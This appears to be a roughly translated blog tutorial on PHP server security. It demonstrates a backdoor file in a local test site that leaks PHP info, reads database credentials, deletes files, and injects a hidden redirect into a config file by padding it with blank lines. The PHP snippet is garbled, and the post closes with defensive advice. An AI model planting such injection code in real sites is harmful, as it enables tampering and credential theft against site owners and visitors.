Today I’m going to talk about server security. These days have been working on server attack and defense issues, fixing some vulnerabilities, writing code people really need to pay attention to security issues. Never trust user input! Today I’ll show you the danger in PHP code.

Test preparation

To simulate, I set up a local server environment to show how a normal website can be attacked.

First modify the computer’s local host file. Now you can use the test.com virtual domain to access local files. The file directory is “C:\Windows\System32\drivers\etc”.

The site directory is simple as follows:

In the portal, reference the database configuration file, and then output a sentence that mimics the home page of the site.

In the database configuration file, I refer to the current popular framework ThinkPHP database configuration file and return an array of basic database information, including the port and password of the database.

And then there’s our big story, hacker backdoor files.

You might think, is that it? What can you do with a few lines of code?

Start simulating attack

Let’s visit our website

The website is accessible without any problems

Access to the hacker files, there seems to be no problem

1. Output PHP version information

Now that the hacker knows your backend PHP version, which plug-ins are installed, what database is used

2. Web page redirection

You can jump to Baidu, which means that hackers have built a running code environment. Now, with your website, you can write a line of code and execute it

3. Read the database configuration information

Have already got your password of what, your website of what data, can modify, afraid. You can even delete the library and run away!!

4. Delete files

Look: 1.txt file is deleted

It’s time to delete files from your website

5. Modify the file

? $info=file_get_contents("Conf/db.php"); $change=str_repeat("\r\n",50); // Replace <? php $file= str_replace("<? php","",$info); / / do you want to add any function can be written in the below $extCode = "header (' location:http://www.baidu.com ');" ; . File_put_contents ("Conf/db.php","<? php".$change.$extCode.$file);Copy the code

How does your db.php file change

Add so many new lines to the header that you think the file is empty, but it has already added a line of jump code to the file, no matter how many people visit your site. I jump to his website

The attack End

Were you surprised? Don’t panic: How can we guard against it?

  • Don’t trust user input! Don’t trust user input! Don’t trust user input!
  • Filtering must be done before obtaining user input;
  • On the server, set the file permissions, not every file can execute script permissions;
  • Or add tamper-proof function;
  • Or change the security group of your server, change the default port 22,21, do not open all ports;
  • Scanning Trojan for the entire site.

😜 😜 😜 😜 😜 😜 😜

I wish you a happy life, good good study, resist all malicious attacks!

😜 😜 😜 😜 😜 😜 😜